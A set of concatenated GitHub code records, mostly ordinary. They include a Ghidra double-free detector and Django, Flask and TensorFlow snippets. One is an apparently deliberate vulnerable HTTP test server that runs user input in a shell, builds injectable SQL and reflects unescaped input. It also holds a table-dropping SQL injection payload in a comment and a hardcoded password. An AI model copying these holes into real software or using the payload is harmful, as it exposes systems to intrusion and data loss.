random.choice(self.nn_param_choices[key])\n\n# def create_set(self, network):\n# \"\"\"Set network properties.\n\n# Args:\n# network (dict): The network parameters\n\n# \"\"\"\n# self.network = network\n\n# def train(self):\n# \"\"\"Train the network and record the accuracy.\n\n# Args:\n# dataset (str): Name of dataset to use.\n\n# \"\"\"\n# if self.accuracy == 0.:\n# self.accuracy = train_and_score(self)\n\n# def set_model(self, trained_model):\n# self.model = trained_model\n \n# def plot_learning_graph (self):\n \n# fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(15, 5), dpi=80, facecolor=\"w\", edgecolor=\"k\")\n\n# data = self.performance_indicator\n# for i in range(0,2):\n# ax = axes[i]\n\n# train = data.iloc[:,i]\n# test = data.iloc[:,i+2]\n\n# ax.plot(train, label=\"Train\")\n# ax.plot(test, label=\"Test\")\n# ax.legend()\n# ax.set_xlabel(\"epoch\")\n\n# if i==0:\n# ax.set_title(\"Loss\")\n# ax.set_ylabel(\"Loss\")\n# else:\n# ax.set_title(\"Accuracy\")\n# ax.set_ylabel(\"Accuracy\")\n\n# ax.ticklabel_format(style='plain', useOffset=False, axis='both')\n\n# plt.tight_layout()\n \n \n# def plot_prediction_value(self):\n \n# fig, axes = plt.subplots(figsize=(15, 5), dpi=80, facecolor=\"w\", edgecolor=\"k\")\n\n# axes.plot(self.y_true, label=\"Actual\")\n# axes.plot(self.y_predict, label=\"Prediction\")\n# axes.legend()\n# axes.set_xlabel(\"Sample index(Weekly)\")\n# axes.set_ylabel(\"Changjiang Copper Spot Price $CNY/ton\")\n# axes.set_title(\"Actual data and predicted data comparison\")\n# axes.ticklabel_format(style='plain', useOffset=False, axis='both')\n\n# plt.tight_layout()\n \n# def print_network(self):\n# \"\"\"Print out a network.\"\"\"\n# logging.info(self.network)\n# logging.info(\"Network accuracy: %.2f%%\" % (self.accuracy * 100))\n\n\n# In[13]:\n\n\n# nn_param_choices = {\n \n# 'window_size':[20],\n# 'batch_size':[i for i in range(4,9)],\n# 'nb_neurons': [i for i in range(3, 41, 1)],\n# 'nb_layers': [i for i in range(1,11)],\n# 'optimizer': ['rmsprop', 'adam', 'sgd', 'adagrad',\n# 'adadelta', 'adamax', 'nadam','ftrl']\n# }\n\n# network = Network(nn_param_choices)\n# network.create_random()\n\n\n# In[14]:\n\n\n# network.network\n\n\n# In[15]:\n\n\n# network.train()\n\n\n# In[16]:\n\n\n# network.plot_learning_graph()\n\n\n# In[17]:\n\n\n# network.plot_prediction_value()\n\n","repo_name":"AlstonYang/MW-GA-GRU","sub_path":".ipynb_checkpoints/train-checkpoint.py","file_name":"train-checkpoint.py","file_ext":"py","file_size_in_byte":11849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23492304530","text":"# Checks the program for Double Free Vulnerabilities in Windows x64 Applications\n\n'''\nThings to add/work on for tracing: \n\nIndirect function calls/function pointer\nhttps://www.diffchecker.com/qdoX8gc5\nhttps://www.geeksforgeeks.org/function-pointer-in-c/\n\nRDI in free() being assigned via XCHG instruction\n'''\n\nprogram_name = currentProgram.getName()\nprint(\"Searching {} for Double Free issues...\\n\".format(program_name))\n\nDYNAMIC = 4194304\nADDRESS = 8192\nDYNAMIC_ADDRESS = DYNAMIC + ADDRESS # This is a ptr memory address like MOV qword ptr [RSP + 0x20], R14\n\n'''\nUtilizes the relocation table within the executable to locate the free function.\nBecause it's a relocation, we need to grab the reference to find the real jump table.\nReturns array of all free() addresses from the reloctable.\n'''\ndef grabLinuxFreeFunctions():\n reloc_table = currentProgram.getRelocationTable()\n relocs = reloc_table.getRelocations()\n \n free_function_list = []\n while relocs.hasNext():\n rel = relocs.next()\n if rel.getSymbolName() == \"free\":\n free_reloc_addr = rel.getAddress()\n refs = getReferencesTo(free_reloc_addr)\n for ref in refs:\n free_addr = ref.getFromAddress()\n free_function_list.append(getFunctionAt(free_addr))\n return free_function_list\n\n'''\nUtilizes the symbol table within the executable to locate the free function. \nReturns array of all free() addresses from the symtable (including any jump table stuff)\n'''\ndef grabWindowsFreeFunctions(): \n symbol_table = currentProgram.getSymbolTable()\n free_symbols = symbol_table.getExternalSymbols(\"free\")\n\n free_function_list = []\n while free_symbols.hasNext():\n sym = free_symbols.next()\n free_function_list.append(getFunctionAt(sym.getAddress()))\n \n return free_function_list\n \n \n'''\nInput: array of functions\nObtains all reference calls to the functions provided in the list. \nReturns an array of dictionaries.\n''' \ndef listRefCalls(function_list):\n call_info_list = []\n for function in function_list:\n func_entry = function.getEntryPoint()\n refs = getReferencesTo(func_entry)\n for ref in refs:\n if ref.getReferenceType().isCall():\n call_addr = ref.getFromAddress()\n try:\n call_func = getFunctionContaining(call_addr).getName()\n call_addr_offset = call_addr.getOffset()\n call_info = {\n 'address': call_addr,\n 'function': call_func,\n 'offset': call_addr_offset\n }\n call_info_list.append(call_info)\n except:\n print('Failed to find function for XREF at {}, skipping.'.format(call_addr))\n continue\n return call_info_list\n\n'''\nThis function calculates the stack offset caused by a CALL instruction (and general stack movement).\n\n# Need to add a tracking function for Stack stuff.\nSince we're going backwards we will see something like MOV RBP, qword ptr [RSP + 0xa0]\nWe gotta track all stack changes so we know where the stack is and what parameter it is\nSUB RSP, 0x50 -> -0x50 (80)\nADD RSP, 0x10 -> +0x10 (16)\nPUSH REG -> -0x8 (8)\nPOP REG -> +0x8 (8)\nStart of the function? -0x8 b/c a call always adds the return address to the stack to make sure it can get back.\n\nDoing all this will give us our RSP+0xZZ value we need to search for in other functions.\n'''\ndef traceStackParameters(current_instr):\n stack_offset = int(current_instr.getInputObjects()[0].getValue())\n while True:\n if current_instr.getAddress() == getFunctionContaining(current_instr.getAddress()).getEntryPoint():\n if current_instr.getMnemonicString() == \"PUSH\":\n stack_offset -= 16 # To account for return value caused by CALL and PUSH\n elif current_instr.getMnemonicString() != \"POP\":\n stack_offset -= 8 # Account for just the return, If for WHATEVER reason there is a POP, then the offset would cancel eachother out so no need to add or subtract. \n return stack_offset\n elif current_instr.getMnemonicString() == \"SUB\" and str(current_instr.getInputObjects()[0] == \"RSP\"):\n scalar_value = int(current_instr.getInputObjects()[1].getValue()) # Returns the scalar for the instruction, ex: SUB RSP, 0x50\n stack_offset -= scalar_value\n elif current_instr.getMnemonicString() == \"ADD\" and str(current_instr.getInputObjects()[0] == \"RSP\"):\n scalar_value = int(current_instr.getInputObjects()[1].getValue()) # Returns the scalar for the instruction, ex: ADD RSP, 0x\n stack_offset += scalar_value\n elif current_instr.getMnemonicString() == \"PUSH\":\n stack_offset -= 8\n elif current_instr.getMnemonicString() == \"POP\":\n stack_offset += 8\n current_instr = current_instr.getPrevious()\n\n'''\nGrabs all references for the current function, and begins an inter function trace for each\nstarting at the instruction prior to the initial referenced call.\nThis will get called everytime a trace hits the top of a function.\n'''\ndef traceExterCallInstructions(inter_trace, stack_ops=None):\n # Just grab the last value in the array to get the earliest instruction in the function.\n earliest_instr = inter_trace[-1]\n current_function = getFunctionContaining(earliest_instr.getAddress())\n \n # Grab the references for the function\n raw_func_refs = listRefCalls([current_function])\n \n # Check if the trace is unsuccessful because it hit the entry of the program.\n if not raw_func_refs:\n print(\"Failed to trace through calls, scanned all the way to entry.\")\n return None\n else:\n func_refs = []\n for ref in raw_func_refs:\n if ref['function'] != current_function.getName(): # We gotta remove any instances of recursion to not waste time.\n func_refs.append(ref)\n \n for ref in func_refs:\n if stack_ops: # If we got stack operations we assign them as the \"target_register\" just to keep everything consistent\n target_register = stack_ops\n else:\n target_register = earliest_instr.getOpObjects(1)\n target_register = [str(i) for i in target_register]\n start_instr = getInstructionAt(ref['address']) # The start instr will be the initial call, but we will be searching starting prior to it.\n ntrace = inter_trace + [start_instr]\n return traceInterFuncInstructions(start_instr.getPrevious(), target_register, False, ntrace, 10) # We're setting a max count of 10 for the initial instruction so we dont get a FP. This can be adjusted.\n\n\n'''\nRuns through the MOV instructions until it gets to the RAX source.\nat that point it grabs the CALL preceeding it. \nIt traces the stack if it hits a DYNAMIC_ADDRESS (pointer MOV) and is RSP, \nand traces external function references/calls to find what it needs to find.\n\nReturns an array containing all MOV and CALL instructions in the trace.\n'''\ndef traceInterFuncInstructions(current_instruction, target_register, return_check, trace_arr=[], max_count=100):\n call_trace = trace_arr\n count = 0\n while True:\n count += 1\n # Gotta first check if we found the *alloc call we're looking for via the return_check.\n if return_check:\n if current_instruction.getMnemonicString() == \"CALL\":\n call_trace.append(current_instruction)\n return call_trace\n else:\n # We need to check if we're at the start of a function, obvious can't be reliably tracing if we have no idea where we are.\n if current_instruction.getAddress() == getFunctionContaining(current_instruction.getAddress()).getEntryPoint():\n if not call_trace:\n print('Failed to trace instructions within the function.')\n return None\n call_trace = traceExterCallInstructions(call_trace)\n return call_trace # Due to recursion, we will hit the CALL return, allowing us to also return here. \n elif current_instruction.getMnemonicString() == \"MOV\": # We're only watching register changes from MOV\n src_value = current_instruction.getOpObjects(0) # Bc we're going backwards in instructions, the src is really the result object\n src_value = [str(i) for i in src_value] # Need them to all be strings\n if src_value == target_register:\n call_trace.append(current_instruction)\n operand_type = current_instruction.getOperandType(1) # Used to check if we're dealing with a stack value\n dst_value = current_instruction.getOpObjects(1) # Bc we're going backwards in instructions, the dst is really the input object\n dst_value = [str(i) for i in dst_value] # Need them to all be strings\n # We need to check if the value is on the stack, so we have to track it through stack changes.\n if operand_type == DYNAMIC_ADDRESS:\n if dst_value[0] == 'RSP': # If it's RSP we're dealing with changes to the current stack, which is an indicator it's being called from a function.\n stack_offset = traceStackParameters(current_instruction)\n stack_ops = [dst_value[0],str(hex(stack_offset))] # Needs to look like ['RSP', '0x8']\n call_trace = traceExterCallInstructions(call_trace, stack_ops)\n return call_trace\n else: # Really only if it's RBP, which is an indicator that the value is simply being stored on the stack near the base pointer.\n return traceInterFuncInstructions(current_instruction.getPrevious(), dst_value, False, call_trace)\n \n else:\n if dst_value == ['RAX']: # We've found the return source, just need to find the call.\n return traceInterFuncInstructions(current_instruction.getPrevious(), dst_value, True, call_trace)\n else:\n return traceInterFuncInstructions(current_instruction.getPrevious(), dst_value, False, call_trace)\n if count == max_count: # Setting the max count so that we dont get any FPs for the exter-func trace.\n print('Failed to find any more register tracings within {} instructions.'.format(str(count)))\n break\n current_instruction = current_instruction.getPrevious()\n\n \n'''\nLoops through all free references and traces them all the way to the *alloc call.\nReturns an array of arrays of each full instruction trace.\n'''\ndef obtainAllFunctionTraces(fcall_info_list, target_reg):\n full_trace_list = [] # An array of arrays containing all traces instructions from *alloc to Free.\n for call_info in fcall_info_list:\n trace_array = []\n func_call_instr = getInstructionAt(call_info['address'])\n trace_array.append(func_call_instr)\n\n current_instruction = func_call_instr\n count = 0\n # We're going to loop through until we find the first instruction that is the first parameter of the free() call.\n while True:\n count += 1\n if current_instruction.getMnemonicString() == \"MOV\": # getResultObjects checks if the src has an address or register (so no scalars)\n src_value = current_instruction.getOpObjects(0) # Bc we're going backwards in instructions, the src is really the result object\n src_value = [str(i) for i in src_value] # Need them to all be strings\n if src_value == target_reg: # The first source value will be the first parameter of the specified architecture/os\n dst_value = current_instruction.getOpObjects(1) # Bc we're going backwards in instructions, the dst is really the input object\n dst_value = [str(i) for i in dst_value] # Need them to all be strings\n trace_array.append(current_instruction)\n call_trace = traceInterFuncInstructions(current_instruction, dst_value, False, []) # We then need to trace all the way back to the source *alloc call.\n # Verify that the trace was successful or not.\n if not call_trace:\n print(\"Trace unsuccessful for {}: {}, skipping.\".format(trace_array[0].getAddress(), trace_array[0]))\n else:\n trace_array = trace_array + call_trace \n trace_array = trace_array[::-1] # Reverse it so the *alloc call is the first in the array (because confusing otherwise).\n full_trace_list.append(trace_array) \n break\n if count == 100:\n break\n current_instruction = current_instruction.getPrevious()\n return full_trace_list\n\n\n'''\nenumerates a list for duplicates of a specific item.\n'''\ndef indices(lst, item):\n return [i for i, x in enumerate(lst) if x == item]\n\n\n'''\nChecks the traces for double free issues by matching the *alloc handles for any duplicates.\nReturns dictionary with the dict value containing the vuln traces.\n'''\ndef checkForDoubleFree(full_trace_list):\n mem_addr_list = []\n for trace_list in full_trace_list:\n mem_addr_list.append(trace_list[0].getAddress())\n \n # We're now going to look for any duplicate memory addresses as that proves a specific *alloc handle is being freed twice.\n raw_dupes_dict = dict((x, indices(mem_addr_list, x)) for x in set(mem_addr_list) if mem_addr_list.count(x) > 1)\n double_free_vulns = {}\n for dupe_addr in raw_dupes_dict.keys():\n vuln_traces = []\n for index in raw_dupes_dict[dupe_addr]:\n vuln_traces.append(full_trace_list[index])\n double_free_vulns[dupe_addr] = vuln_traces\n return double_free_vulns\n\n\n'''\nReturns simple dictionary of formatted call to provide external reference name and symbol name.\n'''\ndef getCallInformation(call_instr):\n call_ptr_addr = call_instr.getOpObjects(0)[0]\n if getReferencesFrom(call_ptr_addr):\n ext_ref_name = getReferencesFrom(call_ptr_addr)[0]\n else:\n ext_ref_name = None\n sym_name = getSymbolAt(call_ptr_addr)\n \n call_info_dict = {\n 'ext_ref_name': ext_ref_name,\n 'sym_name': sym_name\n }\n return call_info_dict\n\n\n'''\nFormats/prints what was returned from checkForDoubleFree()\n'''\ndef formatVulnOutput(vuln_dict):\n for vuln in vuln_dict.keys():\n alloc_instr = getInstructionAt(vuln)\n alloc_info = getCallInformation(alloc_instr)\n print(\"POTENTIAL DOUBLE FREE VULN USING HANDLE ({}): {} ; {} / {}\".format(alloc_instr.getAddress(), alloc_instr, alloc_info['sym_name'], alloc_info['ext_ref_name']))\n print(\"-------------\")\n for trace in vuln_dict[vuln]:\n for instr in trace:\n if instr.getMnemonicString() == \"CALL\":\n call_infos = getCallInformation(instr)\n if call_infos['ext_ref_name']:\n print(\"{}: {} ; {} / {}\".format(instr.getAddress(), instr, call_infos['sym_name'], call_infos['ext_ref_name']))\n else:\n print(\"{}: {} ; {}\".format(instr.getAddress(), instr, call_infos['sym_name']))\n else:\n print(\"{}: {}\".format(instr.getAddress(), instr))\n print('')\n\n\n'''\nFancy main function.\n'''\ndef main():\n # Has to be 64bit\n if str(currentProgram.getLanguageID()) != \"x86:LE:64:default\":\n print(\"Architecture not supported.\")\n return 0\n\n os_type = str(currentProgram.getExecutableFormat())\n # If it's Windows, we need to grab free() differently, and set the first register to RCX due to calling convention\n if os_type == \"Portable Executable (PE)\":\n free_list = grabWindowsFreeFunctions()\n target_reg = ['RCX']\n \n # If it's Linux, we need to grab free() differently, and set the first register to RDI due to calling convention \n elif os_type == \"Executable and Linking Format (ELF)\":\n free_list = grabLinuxFreeFunctions()\n target_reg = ['RDI']\n else:\n print(\"Unknown/Unsupported OS.\")\n return 0\n \n if not free_list:\n print('No symbols for free() were identified.')\n return 0\n\n fcall_info_list = listRefCalls(free_list) # An array of dictionaries containing address, function name, and offset of all free reference calls\n full_trace_list = obtainAllFunctionTraces(fcall_info_list, target_reg)\n \n vuln_dict = checkForDoubleFree(full_trace_list)\n \n if vuln_dict:\n formatVulnOutput(vuln_dict)\n else:\n print('No potential double free vulnerabilities were identified.')\n\n \nif __name__ == '__main__':\n main()\n","repo_name":"AutomoxSecurity/ghidra-double-free-check","sub_path":"DoubleFreeChecker.py","file_name":"DoubleFreeChecker.py","file_ext":"py","file_size_in_byte":17070,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"20889011211","text":"# visit this website\n# https://reeborg.ca/reeborg.html?lang=en&mode=python&menu=worlds%2Fmenus%2Freeborg_intro_en.json&name=Maze&url=worlds%2Ftutorial_en%2Fmaze1.json\n\n# factorial\n\ndef factorial(a):\n fact = 1\n for i in range(1, a+1):\n fact = fact*i\n return(fact)\n\n\nn = int(input(\"Please enter the number: \\n\"))\nprint(f\"Factorial of {n} is {factorial(n)}\")\n\n\nprint(\"===========================\")\nprint(\"finding factorial using recursion\")\n\n\ndef rec_fact(b):\n if b == 1:\n return b\n else:\n return b*rec_fact(b-1)\n\n\nc = int(input(\"Please enter the number: \\n\"))\nprint(f\"Factorial of {c} using recurssion is {rec_fact(c)}\")\n","repo_name":"ishikkkkaaaa/100-PYTHON-PROJECT","sub_path":"Day 6- Factorial/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"22985766765","text":"from dataclasses import field\nfrom statistics import mode\nfrom rest_framework import serializers\nfrom .models import Task\nfrom django.contrib.auth.models import User\nclass TaskSerializer(serializers.ModelSerializer):\n class Meta:\n model=Task\n fields=('id', 'title', 'description', \n 'create_date', 'author_id', 'is_done')\n\n\n\nclass CreateTaskSerializer(serializers.ModelSerializer):\n class Meta:\n model=Task\n fields=('title', 'description')\n extra_kwargs = {'title': {'required': True},\n 'description': {'required': True}} \n\n\n\n def create(self, request, token):\n val_data=request.data\n author= User.objects.filter(auth_token=token).first()\n try:\n task=Task.objects.create(title=val_data['title'],\n description=val_data['description'],\n author_id= author)\n except:\n return None\n task.save()\n return task","repo_name":"YaridTheBoi/ToDoPlus","sub_path":"to_do_plus/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42790687234","text":"try:\n from flask import Flask\n from flask_restful import Resource, Api\n\n from flask_limiter.util import get_remote_address\n from flask_limiter import Limiter\n\n from flasgger import Swagger\n from flasgger.utils import swag_from\n from flask_restful_swagger import swagger\n\nexcept Exception as e:\n print('There is some missing modules {}'.format(e))\n\napp = Flask(__name__)\napi = Api(app)\n\nlimiter = Limiter(app, key_func=get_remote_address)\nlimiter.init_app(app)\n\napi = swagger.docs(Api(app), apiVersion='0.1', api_spec_url='/docs')\n\ndata = []\n\nclass HelloWorld(Resource):\n\n decorators=[limiter.limit(\"100/days\")]\n @swagger.model\n @swagger.operation(notes='some really good notes')\n\n def __init__(self):\n pass\n\n def get(self, name):\n if len(data) < 0 :\n return {\n 'Response': 200,\n 'Data': 'Null'\n }\n return {\n 'Response': 200,\n 'Data': data\n }\n\n def post(self, name):\n temp= {'Name': name}\n data.append(temp)\n return {\n 'Response': 201,\n 'Data': 'Added data with name {}'.format(name)\n }\n\n def delete(self, name):\n for ind,x in enumerate(data):\n if x['Name'] == name:\n temp = data.pop(ind)\n return {\n 'Response': 202,\n 'Note':'Deleted'\n }\n\napi.add_resource(HelloWorld, '/name/')\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"yodji09/training-Python","sub_path":"restApi/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28935729258","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom .models import HeroInfo\nfrom django.core.paginator import Paginator\n\n\n# test5中分页练习 方法1是直接请求带有数字的url链接\n# def herolist(request, page_num=1):\n# hero_list = HeroInfo.objects.all()\n# paginator = Paginator(hero_list, per_page=5)\n# page = paginator.page(page_num)\n# context = {'page': page}\n# return render(request, 'booktest/herolist.html', context=context)\n\n\n# test5中分页练习 方法2是通过get请求传入数字来进行请求(只需要在urls中定义一个url匹配)\ndef herolist(request):\n a = request.GET.get('a', 1)\n hero_list = HeroInfo.objects.all()\n paginator = Paginator(hero_list, per_page=5) # 将信息分成每5个一页\n page = paginator.page(a) # 拿到第a页的数据,是个集合\n context = {\n 'page1': page,\n 'current_page_num': a}\n return render(request, 'booktest/herolist.html', context=context)\n","repo_name":"Mrfranken/djangostudying","sub_path":"test2/booktest/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10255906667","text":"import http.server\r\nfrom urllib.parse import urlparse\r\nfrom urllib.parse import parse_qs\r\nimport os, sys\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\nimport socketserver\r\nimport pathlib\r\nimport mysql.connector\r\nimport traceback\r\nimport subprocess\r\n\r\nclass serverResponse(BaseHTTPRequestHandler):\r\n\r\n ########################################################################################################################################\r\n #Variables\r\n \r\n Error_Page = \"\\\r\n \\\r\n \\\r\n

    Error accessing {path}

    \\\r\n

    {msg}

    \\\r\n \\\r\n \"\r\n mydb = \"\"\r\n \r\n sql_dynamic_content = [\" .34.s.2 \", \" .34.s.2 \"]\r\n currWorkingDir = os.path.abspath(os.getcwd())\r\n \r\n ########################################################################################################################################\r\n #Constructor\r\n \r\n try:\r\n mydb = mysql.connector.connect(host=\"localhost\", user=\"httpUser\", password=\"simpleP4ssPhrase4Testing\", database=\"htmlDB\")\r\n print(\"DB htmlDB connected\")\r\n except Exception as excep:\r\n mydb = mysql.connector.connect(host=\"localhost\", user=\"httpUser\", password=\"simpleP4ssPhrase4Testing\")\r\n dbcursor = mydb.cursor()\r\n dbcursor.execute(\"CREATE DATABASE htmlDB\")\r\n print(\"DB htmlDB created\")\r\n \r\n dbcursor = mydb.cursor(buffered=True)\r\n try:\r\n dbcursor.execute(\"CREATE TABLE htmlInput (id INT AUTO_INCREMENT PRIMARY KEY, input TEXT)\")\r\n print(\"Table htmlInput created\")\r\n except mysql.connector.errors.ProgrammingError as pe:\r\n print(\"Table probably already existed\")\r\n except Exception as excep:\r\n traceback.print_exc()\r\n \r\n ########################################################################################################################################\r\n #Functions\r\n \r\n def do_OPTIONS(self): \r\n self.send_response(200, \"ok\") \r\n self.send_header('Access-Control-Allow-Origin', '*') \r\n self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')\r\n self.send_header(\"Access-Control-Allow-Headers\", \"X-Requested-With\")\r\n \r\n \r\n def do_GET(self):\r\n try:\r\n \r\n #print(\"workingDir: \", currWorkingDir)\r\n #print(self.path)\r\n full_path = os.path.join(self.currWorkingDir, self.path.replace(\"/\", \"\")) #.replace(\"/\", \"\\\\\")\r\n #print(full_path)\r\n url_comp = urlparse(self.path)\r\n query_comp = parse_qs(urlparse(self.path).query)\r\n \r\n # It doesn't exist...\r\n if not os.path.exists(full_path):\r\n #print(\"received: \", self.path)\r\n #print(\"url_comp: \", url_comp)\r\n #print(\"query_comp: \", query_comp)\r\n \r\n #Check if its input from sqlinjection.html odr fileInclusion.html\r\n if url_comp.path == '/sqlinjection.html':\r\n self.handle_sqlInjection_page(query_comp)\r\n elif url_comp.path == '/fileinclusion.html':\r\n self.handle_fileInclusion_page(query_comp)\r\n elif url_comp.path == '/cmdinjection.html':\r\n self.handle_cmdInjection_page(query_comp)\r\n elif url_comp.path == '/phpinjection.html':\r\n self.handle_phpInjection_page(query_comp)\r\n elif url_comp.path == '/xss.html':\r\n self.handle_xss_page(query_comp)\r\n else:\r\n #self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"value.html\"), self.path)\r\n raise Exception(\"Path \" + full_path + \" not found\")\r\n # ...it's a file...\r\n elif os.path.isfile(full_path):\r\n if url_comp.path == '/sqlinjection.html':\r\n self.handle_file(full_path, self.sql_dynamic_content)\r\n else:\r\n self.handle_file(full_path)\r\n # ...it's something we don't handle.\r\n else:\r\n if self.path == '/':\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"index.html\"), self.path)\r\n else:\r\n raise Exception(\"Unknown object: \"+ full_path)\r\n\r\n # Handle errors.\r\n except Exception as msg:\r\n print(\"Error occured: \\n\", msg)\r\n traceback.print_exc()\r\n self.handle_error(msg)\r\n\r\n #Handle the input from page xss.html\r\n #writes back the input from form \r\n def handle_xss_page(self, query_comp):\r\n output = [query_comp[\"xss\"][0]]\r\n print(\"Output: \", output)\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"xss.html\"), output )\r\n\r\n #Handle the input from page phpinjection.html\r\n #Directly executes phpi.php with the given input as parameter\r\n def handle_phpInjection_page(self, query_comp):\r\n #command = \"php -f \" + os.path.join(self.currWorkingDir, \"phpi.php\") + \" phpi=\\\"\" + query_comp[\"phpi\"][0] +\"\\\"\"\r\n #command = command.replace(\"\\\\\", \"\\\\\\\\\")\r\n command = \"php -f phpi.php phpi=\\\"\" + query_comp[\"phpi\"][0] +\"\\\"\"\r\n print(\"Command: \", command)\r\n res = subprocess.run(command, shell=True, stdout=subprocess.PIPE)\r\n output = [\"PHP executed: \\n\"+res.stdout.decode(\"utf-8\")]\r\n print(\"Output: \", output)\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"phpinjection.html\"), output )\r\n \r\n #Handle the input from page cmdinjection.html\r\n #Directly executes the code given by the input in shell\r\n def handle_cmdInjection_page(self, query_comp):\r\n command = subprocess.run(query_comp[\"cmdi\"][0], shell=True, capture_output=True)\r\n output = [\"Command executed: \"+command.stdout.decode(\"utf-8\")]\r\n print(\"Output: \", output)\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"cmdinjection.html\"), output )\r\n \r\n #Handle the input from page fileInclusion.html\r\n #Enables Directory Traversal and Remote and Local file inclusion by executing the given file\r\n def handle_fileInclusion_page(self, query_comp):\r\n filePath = query_comp['fi'][0]\r\n res = subprocess.run(filePath, shell=True, stdout=subprocess.PIPE)\r\n output = [\"File executed: \"+filePath+ \"; Result: \"+ res.stdout.decode(\"utf8\")]\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"fileinclusion.html\"), output )\r\n\r\n # Handle the input from page sqlinjection.html\r\n # Exploit input: '; drop table htmlInput; select * from htmlInput where input = '\r\n def handle_sqlInjection_page (self, query_comp):\r\n if 'sql_insert' in query_comp:\r\n sql = \"INSERT INTO htmlInput (input) VALUES (%s)\"\r\n val = (query_comp['sql_insert'][0],)\r\n self.dbcursor.execute(sql, val)\r\n self.mydb.commit()\r\n self.dbcursor.execute(\"SELECT * FROM htmlInput\")\r\n result = self.dbcursor.fetchall()\r\n self.sql_dynamic_content[1] = \".\"\r\n self.sql_dynamic_content[0] = result\r\n for res in result:\r\n print(\"Result insert: \", res)\r\n else:\r\n sql = \"select * from htmlInput where input = '\" + query_comp['sql'][0] + \"'\"\r\n print(\"Injection String: \", sql)\r\n results = self.dbcursor.execute(sql, multi=True)\r\n result = []\r\n for res in results:\r\n print(\"Executed command: \", res)\r\n if res.with_rows:\r\n result += self.dbcursor.fetchall()\r\n self.mydb.commit()\r\n self.sql_dynamic_content[0] = \".\"\r\n self.sql_dynamic_content[1] = result\r\n print(\"Result of execution:\", result)\r\n \r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"sqlinjection.html\"), self.sql_dynamic_content)\r\n \r\n \r\n # Handle unknown objects.\r\n def handle_error(self, msg):\r\n content = self.Error_Page.format(path=self.path, msg=msg).encode(\"utf-8\")\r\n self.send_content(content, 404)\r\n\r\n # Send actual content.\r\n def send_content(self, content, status=200):\r\n self.send_response(status)\r\n self.send_header('Access-Control-Allow-Origin', '*')\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.send_header(\"Content-Length\", str(len(content)))\r\n self.end_headers()\r\n self.wfile.write(content)\r\n\r\n # Prepare content to be sent \r\n def handle_file(self, full_path, value=[\" .34.s.2 \"]):\r\n try:\r\n with open(full_path, 'rb') as reader:\r\n content = reader.read()\r\n if not \".js\" in self.path:\r\n content = content.decode(\"utf-8\").format(*value)\r\n content = content.replace(\".34.s.2\", \"\")\r\n content = content.encode(\"utf-8\")\r\n self.send_content(content)\r\n except IOError as msg:\r\n msg = \"'{0}' cannot be read: {1}\".format(self.path, msg)\r\n self.handle_error(msg)\r\n \r\n########################################################################################################################################\r\n#Starter\r\n\r\nif __name__ == \"__main__\": \r\n httpd = socketserver.TCPServer((\"\", 8000), serverResponse)\r\n print(\"Server started!\")\r\n print(\"serving at port:\", 8000)\r\n httpd.serve_forever()\r\n \r\n print(\"Server ende\")","repo_name":"SteNu5/ServerBenchmarkTest","sub_path":"ServerBenchmarkTest_Extended/httpServer.py","file_name":"httpServer.py","file_ext":"py","file_size_in_byte":9564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27418585489","text":"import math\nimport numpy as np \nimport tensorflow as tf\nimport random\nfrom tensorflow.python.framework import ops\n\nfrom utils import *\n\ntry:\n image_summary = tf.compat.v1.summary.image\n scalar_summary = tf.compat.v1.summary.scalar\n histogram_summary = tf.compat.v1.summary.histogram\n merge_summary = tf.compat.v1.summary.merge\n SummaryWriter = tf.compat.v1.summary.FileWriter\nexcept:\n image_summary = tf.compat.v1.summary.image\n scalar_summary = tf.compat.v1.summary.scalar\n histogram_summary = tf.compat.v1.summary.histogram\n merge_summary = tf.compat.v1.summary.merge\n SummaryWriter = tf.compat.v1.summary.FileWriter\n\n# if \"concat_v2\" in dir(tf):\n# def concat(tensors, axis, *args, **kwargs):\n# return tf.concat_v2(tensors, axis, *args, **kwargs)\n# else:\n# def concat(tensors, axis, *args, **kwargs):\n# return tf.concat(tensors, axis, *args, **kwargs)\n\n\ndef conv2d(input_, input_dim,output_dim, \n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\n name=\"conv2d\"):\n with tf.compat.v1.variable_scope(name):\n\n w = tf.compat.v1.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],\n initializer=tf.compat.v1.truncated_normal_initializer(stddev=stddev))\n conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')\n\n biases = tf.compat.v1.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))\n conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())\n return conv,w, biases\n\n \ndef deconv2d(input_, output_shape,\n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\n name=\"deconv2d\", with_w=False):\n with tf.compat.v1.variable_scope(name):\n # filter : [height, width, output_channels, in_channels]\n w = tf.compat.v1.get_variable('w', 